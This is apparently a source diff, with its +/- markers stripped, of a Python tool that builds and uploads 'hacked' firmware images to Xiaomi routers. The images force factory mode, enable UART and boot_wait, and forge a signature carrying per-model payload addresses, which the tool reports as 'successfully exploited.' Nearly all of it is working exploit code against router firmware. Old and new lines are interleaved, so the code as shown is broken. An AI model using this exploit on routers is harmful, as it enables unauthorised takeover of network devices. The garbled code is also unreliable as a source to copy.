@ -10,6 +10,7 @@ import ctypes
import hashlib
import binascii
import re
import requests
from xqimage import *
@ -38,45 +39,11 @@ class ExFlasher():
devinf = None
syslog = None
def __init__(self, gw):
def __init__(self, gw, ext = 'bin'):
self.gw = gw
self.ext = ext
self.devinf = DevInfo(gw, verbose = 0, infolevel = 0)
self.syslog = SysLog(gw, timeout = 17, verbose = 1, infolevel = 2)
def build_sign(self, model):
def i2b(value):
return value.to_bytes(4, byteorder='little')
model = model.upper()
payload = None
if model == "R3G":
poffset = 0x1058
payload = i2b(0x416078) + i2b(0) + i2b(0) + i2b(0x402810)
if model == "RA69":
poffset = 0x1070
payload = i2b(0x4152A8) + i2b(0) + i2b(0x402634) + i2b(0)
if model == "RA70":
poffset = 0x1078
payload = i2b(0x4152D0) + i2b(0) + i2b(0x40265C) + i2b(0)
if model == "RA72":
poffset = 0x1078
payload = i2b(0x4152E0) + i2b(0) + i2b(0x402630) + i2b(0)
if model == "R3600":
poffset = 0x1070
payload = i2b(0x415290) + i2b(0) + i2b(0x402634) + i2b(0)
if model == "RB03":
poffset = 0x1078
payload = i2b(0x4148B0) + i2b(0) + i2b(0x40263C) + i2b(0)
if not payload:
die('Payload is not defined for device "{}".'.format(model))
# add header of sign section (16 bytes)
sign = i2b(poffset) + (b'\x00' * 12)
# add fake sign
size = poffset - len(payload)
for i in range(0, size, 4):
sign += (0xEAA00000 + i).to_bytes(4, byteorder='little')
# add payload
sign += payload
return sign
self.syslog = SysLog(gw, timeout = 22, verbose = 1, infolevel = 2)
def get_bdata_env(self, syslog = None, verbose = 1):
syslog = syslog if syslog is not None else self.syslog
@ -94,10 +61,22 @@ class ExFlasher():
bdata.var['wl1_ssid'] = facinfo['wl1_ssid']
return bdata
def create_crash_image(self, mtd, prefix, outfilename):
crash = types.SimpleNamespace()
crash.mtd = mtd
if prefix is None:
prefix = b''
crash.buf = bytearray(prefix + b'\xFF' * (mtd.size - len(prefix)))
crash.img = XQImage(self.gw.device_name)
crash.img.add_file(crash.buf, 'crash.bin', mtd = mtd.id)
print('Created hacked image file: "{}"'.format(outfilename))
return crash
def create_hack_images(self):
imgdict = {}
dn = self.gw.device_name
signature = self.build_sign(dn)
bdata = self.get_bdata_env(verbose = 2)
bdata.var['boot_wait'] = "on"
bdata.var['uart_en'] = "1"
@ -122,48 +101,41 @@ class ExFlasher():
if not crash_mtd:
die('MTD partition "{}" not found!'.format(partname))
def create_crash_image(mtd, prefix, outfilename):
crash = types.SimpleNamespace()
crash.mtd = mtd
if prefix is None:
prefix = b''
crash.buf = bytearray(prefix + b'\xFF' * (mtd.size - len(prefix)))
crash.img = XQImage(self.gw.device_name)
crash.img.add_file(crash.buf, 'crash.bin', mtd = mtd.id)
crash.img.save_image(signature, outfilename)
print('Created hacked image file: "{}"'.format(outfilename))
return crash
# image for activate "factory mode" via uboot (insert factory_mode=1 into kernel cmdline)
imgdict['crash1'] = 'outdir/image_{device}_1_crash.bin'.format(device = dn)
crash1 = create_crash_image(crash_mtd, b'\xA5\x5A\x00\x00', imgdict['crash1'])
imgdict['crash1'] = 'outdir/image_{device}_1_crash.{ext}'.format(device = dn, ext = self.ext)
crash1 = self.create_crash_image(crash_mtd, b'\xA5\x5A\x00\x00', imgdict['crash1'])
# image for change BData environment
imgdict['bdata'] = 'outdir/image_{device}_2_bdata.bin'.format(device = dn)
bdata.img.save_image(signature, imgdict['bdata'])
imgdict['bdata'] = 'outdir/image_{device}_2_bdata.{ext}'.format(device = dn, ext = self.ext)
print('Created hacked image file: "{}"'.format(imgdict['bdata']))
# image for deactivate "factory mode" via uboot
imgdict['crash3'] = 'outdir/image_{device}_3_crash.bin'.format(device = dn)
crash3 = create_crash_image(crash_mtd, None, imgdict['crash3'])
imgdict['crash3'] = 'outdir/image_{device}_3_crash.{ext}'.format(device = dn, ext = self.ext)
crash3 = self.create_crash_image(crash_mtd, None, imgdict['crash3'])
# image for testing (debug)
#fn_test = 'outdir/image_{device}_test.bin'.format(device = dn)
#test = create_crash_image(crash_mtd, b'TEST_DEBUG', fn_test)
#fn_test = 'outdir/image_{device}_test.{ext}'.format(device = dn, ext = self.ext)
#test = self.create_crash_image(crash_mtd, b'TEST_DEBUG', fn_test)
return imgdict
def upload_rom(self, filename, timeout=6):
def upload_rom(self, filename, timeout=6, verbose = 1):
self.upload_res = None
if not self.gw.stok:
if verbose:
print('Upload HDR1 image "{}" to device ...'.format(filename))
ok = False
res = requests.post(self.gw.apiurl + "xqsystem/upload_rom", files={"image":open(filename, 'rb')}, timeout=4)
self.upload_res = res
if verbose:
print('Response:', res.text)
except requests.exceptions.Timeout as e:
ok = True
if verbose:
print('The hacked image has been successfully exploited. The device reboots...')
if timeout > 0:
if not self.gw.wait_shutdown(timeout):
die('The hacked image "{}" did not trigger a reboot.'.format(filename))
#print('Device not responding.')